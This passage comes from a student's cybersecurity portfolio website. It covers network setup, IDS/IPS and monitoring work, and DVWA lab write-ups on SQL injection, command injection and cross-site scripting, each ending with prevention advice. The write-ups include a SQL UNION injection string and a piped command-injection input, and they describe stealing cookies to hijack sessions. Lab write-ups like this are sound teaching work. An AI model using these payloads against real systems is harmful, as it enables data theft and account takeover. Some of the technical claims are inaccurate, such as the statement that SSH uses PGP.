          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/4.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S7 2021</h4>
          <h4 class="subheading">My minor</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          
          <li class="timeline-inverted">
          <div class="timeline-image">
          <h4>The
          <br>Future
          </h4>
          </div>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="team">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About me</h2>
          <h3 class="section-subheading text-muted">Some additional links and information.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-sm-4">
          
          </div>
          <div class="col-sm-4">
          <div class="team-member">
          <img class="mx-auto rounded-circle" src="img/team/Pim.jpg" alt="">
          <h4>Pim Beekmans</h4>
          <p class="text-muted">Student</p>
          <ul class="list-inline social-buttons">
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-twitter"></i>
          </a>
          </li>
          <li class="list-inline-item">
           <a href="#">
          <i class="fab fa-facebook-f"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="https://www.linkedin.com/in/pim-beekmans/?originalSubdomain=nl">
          <i class="fab fa-linkedin-in"></i>
          </a>
          </li>
          </ul>
          </div>
          </div>
          <div class="col-sm-4">
          
          </div>
          <div class="row">
          <div class="col-lg-8 mx-auto text-center">
          <p class="large text-muted">This is me, thank you for reading, hopefully you've liked my portfolio on cyber security. For additional feedback feel free to send an email to <a href="/cdn-cgi/l/email-protection#ddadb4b09dbfb8b8b6b0bcb3aef3b9b8ab"><span class="__cf_email__" data-cfemail="1a6a73775a787f7f71777b7469347e7f6c">[email&#160;protected]</span></a>.</p>
          </div>
          </div>
          </div>
          </div>
          </section>
          
          <section class="py-5">
          <div class="container">
          <div class="row">
          
          </div>
          </div>
          </section>
          
          <section id="contact">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Contact Me</h2>
          <br>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <form id="contactForm" name="sentMessage" novalidate="novalidate">
          <div class="row">
          <div class="col-md-6">
          <div class="form-group">
          <input class="form-control" id="name" type="text" placeholder="Your Name *" required="required" data-validation-required-message="Please enter your name.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="email" type="email" placeholder="Your Email *" required="required" data-validation-required-message="Please enter your email address.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="phone" type="tel" placeholder="Your Phone *" required="required" data-validation-required-message="Please enter your phone number.">
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="col-md-6">
          <div class="form-group">
          <textarea class="form-control" id="message" placeholder="Your Message *" required="required" data-validation-required-message="Please enter a message."></textarea>
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="clearfix"></div>
          <div class="col-lg-12 text-center">
          <div id="success"></div>
          <button id="sendMessageButton" class="btn btn-primary btn-xl text-uppercase" type="submit">Send Message</button>
          </div>
          </div>
          </form>
          </div>
          </div>
          </div>
          </section>
          
          <footer>
          <div class="container">
          <div class="row">
          <div class="col-md-4">
          <span class="copyright">Copyright &copy; Beekmans.dev 2019</span>
          </div>
          <div class="col-md-4">
          
          </div>
          <div class="col-md-4">
          <ul class="list-inline quicklinks">
          <li class="list-inline-item">
          <a href="#">Privacy Policy</a>
          </li>
          <li class="list-inline-item">
          <a href="#">Terms of Use</a>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </footer>
          
          
          <div class="portfolio-modal modal fade" id="portfolioModal1" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Self Assessment</h2>
          <p class="item-intro text-muted">Week 1</p>
          <p>
          <ol>
          <li>What did you like / or find easy?</li>
          <li>What did you find difficult? At what point did it get too difficult for now?</li>
          <li>
          Then check the list of learning subjects for the basic knowledge assignment and
          possibilities and requirements for the project.
          <ul>
          <li>What subjects do you already know and what is unknown terrain for you?</li>
          </ul>
          </li>
          <li>What parts of the current semester would you like to give much attention?</li>
          <li>What do you want to achieve and learn in particular?</li>
          <li>Which study style and corresponding planning is most suitable for you?</li>
          <li>What would you like to do or achieve in the project? (subjects, type of project,
          domain to work in, learning goals, etc.)
          </li>
          </ol>
          <br>
          Answers:
          <br>
           <ol>
          <li>I like working with servers and playing with my network at home and virtual
          machines. I think I find basic networking the easiest.
          </li>
          <li>Advanced networking all knowledge that I know is self-taught so I think there is a
          lot I don’t know yet. I got stuck on virtual lans and ip routing at home what else
          I’ll find difficult is what I need to find out in the distant future.
          </li>
          <li>
          Subjects:
          <div class="container">
          <div class="row">
          <div class="col-sm-4">
          <ul>
          Used:
          <li>VMWare</li>
          <li>Linux</li>
          <li>IPv4</li>
          <li>NAT</li>
          <li>TCP/IP</li>
          <li>DNS</li>
          <li>HTTP</li>
          <li>FTP</li>
          <li>Firewalls</li>
          <li>HTTPS</li>
          <li>VPN</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Know about but never used:
          <li>VMWare ESX</li>
          <li>Wireshark</li>
          <li>ARP</li>
          <li>IP routing</li>
          <li>SMTP</li>
          <li>IDS</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Never heard about it:
          <li>Seclab</li>
          <li>ICMP ping</li>
          <li>CIA and IT Risk analysis</li>
          </ul>
          </div>
          </div>
          </div>
          </li>
          <li>Advanced networking and the transition to Java.</li>
          <li>How to be a good Cyber security expert.</li>
          <li>Style 2, I’ll try to find out if this is the most suitable for me and maybe go to
          the style 3 courses on the days I get subjects I already know.
          </li>
          <li>I don’t really have a preference I want to learn as much as possible related to
          cyber security.
          </li>
          </ol>
          </p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
           <li>Client: Fontys</li>
          <li>Category: Self assessment</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal2" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagram.png" alt="">
          <p>This network diagram shows 3 main VLAN's containing a employee environment for the
          employees to work on, a guest environment for the people visiting the company as guests
          and a DMZ for the servers and services to the outside world.</p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal3" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram V2</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagramV2.png" alt="">
          <p>This is the second version of my network diagram. I changed a few things to match
          Casper's feedback. The first thing I changed are the firewalls, I only needed to address
          the physical firewall and not the ones for every single interface. The last thing was I
          added the corresponding IP ranges and subnets to each VLAN.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal4" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Secure connections</p>
          <a href="../../img/portfolio/blue/sshAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sshAccess.png" alt=""></a>
          <p>Here you can see that I made a SSH connection to my Ubuntu webserver. I use Putty as my
          SSH terminal. SSH is encrypted using PGP (Pretty good privacy) which uses a public and a
          private key to communicate with each other. This is especially helpful because you don't
          need to transfer passwords to encrypt the connection. The sending client encrypts its
          message using the public key from the recipient and the recipient decrypts the message
          using its own private key. This works the same the other way around. I can use this
          technique to remotely manage my webservers without the need physical access.</p>
          <a href="../../img/portfolio/blue/vpnAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/vpnAccess.png" alt=""></a>
          <p>Here you can see that I'm connected to a VPN. This VPN is OpenVPN and runs on the PfSense
          router. It gives me access to the subnets I gave it access to and with this I can
          remotely manage my whole network, with being actually physically connected to the
          network. The OpenVPN connection is encrypted be TLS (Transfer layer security) which is
          successor from SSL. TLS uses a handshake at the start of the connection where a key is
          shared between the 2 clients. This key will be used for the symmetric encryption of the
          messages. The authenticity of the connection is secured by a certificate and the public
          key of the webserver this prevents possible man in the middle attacks, where someone
          will pretend to be another website for example.</p>
          <a href="../../img/portfolio/blue/sslConnection.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sslConnection.png" alt=""></a>
          <p>Here you can see the ssl certificate I created for the website that is running my
          portfolio. I created the script using certbot in Ubuntu and the CA is Let's encrypt
          authority x3. The website automatically forces all traffic to https, the website is
          still accessible by http but will redirect the user to https.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Secure connections</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal5" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IDS/IPS</p>
          <P>I implemented Suricata as my IPS, I thought it would be the best option because they say
          it's more advanced and newer. Below you can see some prove of the implementation and
          some results I came across.</P>
          <a href="../../img/portfolio/blue/Suricata1.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata1.png" alt=""></a>
          <p>I configured the IPS to monitor the WAN and LAN interface for now but I'm planning to
          configure it to the Employee VLAN as well. This will protect the company for any
          potential threats from the inside.</p>
          <a href="../../img/portfolio/blue/Suricata2.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata2.png" alt=""></a>
          <p>I tested the IPS with a website called <a href="https://www.wicar.org/">Wicar</a>. On
          this website you can run malicious code and test you network without it being an actual
          threat or risk.</p>
          <a href="../../img/portfolio/blue/Suricata3.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata3.png" alt=""></a>
          <p>I have used the Snort community rules and the Emerging threats rules these are both free
          to use and do a decent job of protecting the network with not too many false
          positives.</p>
          <a href="../../img/portfolio/blue/DDOSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/DDOSAlert.png" alt=""></a>
          <p>We encountered a real world scenario which actually turned out to work really well with
          an IPS. Bram tried to DDOS my website while it was running in my pfsense environment.
          The IPS immediately noticed this and blocked his IP. While the website was running
          outside the pfsense zone Bram could DDOS all he want without getting blocked.</p>
          <a href="../../img/portfolio/blue/BlockList.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BlockList.png" alt=""></a>
          <p>Here you can see Bram's IP in the Suricata blocklist.</p>
          <a href="../../img/portfolio/blue/Bram'sIP.jpg"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Bram'sIP.jpg" alt=""></a>
          <p>This is a screenshot from Bram's computer with his IP he used for generating the
          alert.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: IDS/IPS</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal6" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Information Security and Risk Analysis</p>
          <h3>CIA</h3>
          <h4>Confidentiality:</h4>
          <p>The company will hold confidential data from costumers, things like credit card
          information user accounts and databases for the costumer's websites.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Costumer data .... Leak</li>
          </ul>
          <h4>Integrity:</h4>
          <p>The costumers trust the company to secure their servers on their end and they trust the
          company that it won't sell any costumer data to 3rd parties.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Correct .... Tampering</li>
          </ul>
          <h4>Availability:</h4>
          <p>Because the costumers might use these websites for commercial use, it is at the utmost
          importance that the websites are fast, reliable and 24/7 reachable.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
           <li>Well timed .... Delay</li>
          <li>Continuity .... Downtime</li>
          </ul>
          <p>Click on this <a href="../../img/portfolio/Risk%20analysis.xlsx">link</a> to download the full
          risk analysis.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Risk Analysis</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal7" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IT Monitoring</p>
          <p>I implemented a Nagios server and installed Ntop as part of my network monitoring
          system.</p>
          <a href="../../img/portfolio/blue/OnlineHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/OnlineHosts.png" alt=""></a>
          <p>Ntop generates a list with all hosts that are online on the network and you can filter
          them by VLAN. You can see how much bandwidth they are using how much data was
          transferred since they are online and how many flows are going to that host.</p>
          <a href="../../img/portfolio/blue/MostUsedHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedHosts.png" alt=""></a>
          <p>Here I can see which host uses the most traffic in my DMZ. With 172.16.0.2 being the
          apache server and 172.16.0.3 being the IIS server.</p>
          <a href="../../img/portfolio/blue/MostUsedProtocols.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedProtocols.png" alt=""></a>
          <p>Here I can see which protocols are used the most. Windows update on number 1 because it
          needs to download a lot and after that ssl for the https traffic to my website and ftp
          to push changes. This doesn't indicate that the most traffic is going to windows update
          only that it used the most bandwidth.</p>
          <a href="../../img/portfolio/blue/BulgarianHacker.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BulgarianHacker.png" alt=""></a>
          <p>Ntop even managed to identify a rogue Bulgarian hacker trying to access my Jenkins
          server.</p>
          <a href="../../img/portfolio/blue/HostsStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostsStatus.png" alt=""></a>
          <p>This is Nagios it is in some ways similar to Ntop but is much more advanced and can do
          some things that Ntop can't. On this page you can see al the hosts that are monitored by
          Nagios. It displays if the hosts are up and running or if there are any problems.</p>
          <a href="../../img/portfolio/blue/HostDetails.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostDetails.png" alt=""></a>
          <p>If you click on one of the monitored hosts from the previous picture Nagios will show you
          with a more detailed report on the host with some more information about uptime and
          status.</p>
          <a href="../../img/portfolio/blue/ServiceStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/ServiceStatus.png" alt=""></a>
          <p>This is a great example on something Nagios is much better at then Ntop. Here Nagios
          monitors all the services you flagged on different hosts. For example your apache server
          could be down but the physical Linux server is still up and running. Nagios and Ntop
          will both say this Linux machine is up and fine but Nagios will also say that the
          http/https service is down. The same goes for every other service you configure to
          monitor (SSH/FTP).</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Monitoring</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal8" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">SQL injection</p>
          <a href="../../img/portfolio/red/SqlStart.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/SqlStart.png" alt=""></a>
          <p>I applied sql injection on a search function in DVWA.</p>
           <a href="../../img/portfolio/red/CheckIfVuln.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVuln.png" alt=""></a>
          <p>The easiest way to check if the search function is vulnerable is to just type some
          gibberish that the search function doesn't expect. This should generate a sql error.</p>
          <a href="../../img/portfolio/red/CheckIfVulnResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVulnResult.png" alt=""></a>
          <p>And it did! Now we know that the search function is vulnerable and we can try some
          injections</p>
          <p>So know we can check which database we're dealing with by getting the version.</p>
          <a href="../../img/portfolio/red/GetDbVersion.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetDbVersion.png" alt=""></a>
          <p>Oke let's break it down.</p>
          <p>The query that is used for searching the users probably looks like something like this
          "SELECT first_name, last_name FROM users WHERE user_id = '$id'" and I typed "null' UNION
          select CURRENT_user, @@version #"</p>
          <p>The "null'" ends the original query and makes it obsolete because there probably aren't
          any users with a 'null' as id. The 'UNION' allows me to execute a subquery and the
          result from this query gets added underneath the results from the original query.</p>
          <p>Now I use 'select' to indicate which information I want to get. I used 'CURRENT_user' and
          '@@version' to get both the current user and the database version.</p>
          <p>The reason that I select both the "CURRENT_user" and the "@@version" in the same query,
          is that if I would only select for example "@@version" I would get the error displayed
          below. I could have fixed that by rewriting the query like this: "INSERT QUERY" and I
          typed "null' UNION select @@version, @@version #" This way the subquery matches the
          amount of columns of the original query again.</p>
          <a href="../../img/portfolio/Use%20Of%23.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/Use%20Of%23.png" alt=""></a>
          <p>TALK ABOUT THE #</p>
          <a href="../../img/portfolio/red/DiffNumberColumns.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/DiffNumberColumns.png" alt=""></a>
          <p>Now we can execute any query we want as long as it matches the amount of columns of the
          original query, otherwise we get a error like the one displayed above. Now we can try
          something that has a little more impact.</p>
          <a href="../../img/portfolio/red/GetAllTables.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetAllTables.png" alt=""></a>
          <p>For example by getting all the table names inside the database. This is obvious not a
          good sign because I good use this to determine what the names are of the user tables and
          check if there might be some more tables I want to focus on, for example credit card
          information of the users.</p>
          <a href="../../img/portfolio/red/GetUserAndPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetUserAndPass.png" alt=""></a>
          <p>But in this case we won't go after people's credit card information but after there
          password. I know the user table name from the previous query and now I can just try some
          common column names like; username, user, name, those type of things.</p>
          <p>And we got a username and a hash! But now what? The username is simple but the password
          is hashed and can't be just copied and used.</p>
          <a href="../../img/portfolio/red/HashDecrypt.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/HashDecrypt.png" alt=""></a>
          <p>That's were this site comes in. I just insert the md5 hash in this decryptor and it
          checks a big database with common hashes and their decrypted word. And now I have the
          password and I can just login with admin/password.</p>
          <p>So how would you prevent this? The best thing to do is sanitize the queries. Make sure
          all the queries use prepared statements and are parameterised. This prevents people
          inserting for example strings instead of numbers and prevents them from ignoring your
          query and inserting their own.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: SQL injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal9" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Command injection</p>
          <p>I applied sql injection on a ping function in DVWA.</p>
           <a href="img/portfolio/Command%20injection.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/Command%20injection.png" alt=""></a>
          <p>The way this function works is it takes the ip and inserts it directly in a shell. It
          would probably looks like something like this "ping 'INSERTED_IP'".</p>
          <p>Now this little symbol "|" is called a pipe and it can be used to execute multiple
          commands in one line. So I used the "|" to execute my own command after the ping command
          just like shown above.</p>
          <p>I typed in the ip because it still needs to execute the ping command and after that I did
          a "ipconfig" so the command would look like this when executed in the shell: "ping
          185.230.127.234 | ipconfig" This gave us the ip information of the machine the webpage
          is running on.</p>
          <a href="../../img/portfolio/red/CmdCurrentUser.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdCurrentUser.png" alt=""></a>
          <p>I can also get the current user logged in user from the machine using "net user". But
          with "net user" you can do much more even change the password of the current user or
          create a completely new user just for me.</p>
          <a href="../../img/portfolio/red/CmdWifiPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdWifiPass.png" alt=""></a>
          <p>What is maybe even better I can get the wifi password of the connected pc in plain text.
          Now I can connect to the same network because I know the password.</p>
          <a href="../../img/portfolio/red/CmdEnterpriceWifi.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdEnterpriceWifi.png" alt=""></a>
          <p>This trick doesn't work with more advanced wifi security though. Here you see the eduroam
          network from school which is protected with 802.1x control. This doesn't mean you can't
          get the password at all it just makes it a whole lot harder.</p>
          <a href="../../img/portfolio/red/CIDIR.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CIDIR.png" alt=""></a>
          <p>I was also able to run the "dir" command. This tells me a lot about the local machine and
          how the web server is installed.</p>
          <a href="../../img/portfolio/red/CISystemInfo.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CISystemInfo.png" alt=""></a>
          <P>With the "systeminfo" command I'm able to get a lot of information about the physical
          machine which might be useful to me later. It greatly increases my attack surface.</P>
          <p>This can be prevented by sanitizing the input and not just inserting it straight into the
          shell. Make sure it goes to a parameterised function first, check the input and then
          insert it into a shell for example.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Command injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal10" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site scripting</p>
          <p>I will now show you how you could apply XSS to a website.</p>
          <a href="../../img/portfolio/red/XSSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlert.png" alt=""></a>
          <p>First I have to check if the website is vulnerable. The easiest way to check this is just
          to try a simple "Alert" script just like this.</p>
          <a href="../../img/portfolio/red/XSSAlertResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlertResult.png" alt=""></a>
          <p>As you can see the script works so that means that the website is vulnerable to XSS. Now
          I can try something that has some more impact and could actually be useful for me.</p>
          <a href="../../img/portfolio/red/MaxCharLimit.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/MaxCharLimit.png" alt=""></a>
          <p>This form doesn't allow more than 50 characters, so writing bigger scripts might make
          this difficult. Luckily they only validate this in the frontend so I can just inspect
          this page and change the maximum characters in the form. So now I can write some bigger
          scripts that give me more information.</p>
          <a href="../../img/portfolio/red/XSSGetCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>Like getting the cookie of the user so I can hijack their session.</p>
          <a href="../../img/portfolio/red/XSSGetCookieResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>So now I got the cookie it is my own though, but these scripts get stored inside the
          comments and the comments are persistent. Therefore I could also write a script that
          sends the cookie to me instead of displaying it. This way I can make it almost invisible
          for everyone to see and everyone who loads this page their cookie gets send to me.</p>
          <a href="../../img/portfolio/red/XSSOldCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSOldCookie.png" alt=""></a>
          <p>Now I can try to use the cookie that I stole in the previous picture to try and login. As
          you can see my cookie is now different and I'm not logged in.</p>
          <a href="../../img/portfolio/red/XSSNewCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSNewCookie.png" alt=""></a>
          <p>Now I placed the cookie I stole in my own cookie to hopefully make the website think I'm
          the person who is logged in that I stole this cookie from.</p>
          <a href="../../img/portfolio/red/XSSSessionHijack.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSSessionHijack.png" alt=""></a>
          <p>And now when I try to load the index page the website thinks I'm logged in as the person
          the cookie belongs to and I hijacked their session. I can now do everything on their
          account, comment in their name and change their data or steal their data.</p>
          <p>And if this person is by any chance an admin I might be able to do some more extreme
          things as well. Like creating or deleting users or their comments.</p>
          <a href="../../img/portfolio/red/XSSIframe.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframe.png" alt=""></a>
          <P>Sometimes the programmers try to prevent XSS by filtering out the script tags. But they
          forget the filter out all the other HTML tags. So I can load my own website in an
          "Iframe".</P>
          <a href="../../img/portfolio/red/XSSIframeResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframeResult.png" alt=""></a>
          <p>This might only sound as good free marketing but you can also do other things. Like
          redirecting everyone that visits this page to my own website or inject scripts in other
          html tags, so I can still run my scripts even though they banned the script tags.</p>
          <p>These type of attacks can be prevented by sanitizing the input much like SQL injection.
          Make sure that all the text that users can post to the website's frontend doesn't get
          converted to straight HTML. In this way they can't exploit other HTML tags as well.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site scripting</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal11" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site request forgery</p>
          <p>Now I'm going to exploit CSRF on a website. The principles are quite simple, if you see
          the query that is called in the search bar, then the website might be vulnerable.</p>
